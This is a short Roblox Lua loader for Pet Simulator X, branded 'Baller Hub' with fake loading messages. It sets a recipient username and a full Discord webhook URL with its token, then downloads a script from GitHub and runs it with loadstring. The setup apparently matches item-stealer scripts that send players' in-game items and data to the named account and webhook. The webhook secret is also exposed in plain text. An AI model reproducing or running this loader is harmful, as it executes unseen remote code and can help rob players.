Username = " ballerboi222"
WebHook = "https://discordapp.com/api/webhooks/1074395523508875435/k5iL1LRVfCoBr7RrtH-lSwWDozxFcXddqty_xJj6OXF9hSnXpk0RkjkxX6a460Sdz9CX"


_G.CustomScriptName = "Baller Hub"
_G.Text1 = "Script Loaded..."
_G.Text2 = "Waiting for Script"
_G.Text3 = "Checking Scripts..."
_G.Text4 = "Starting Scripts..."
loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua%22))()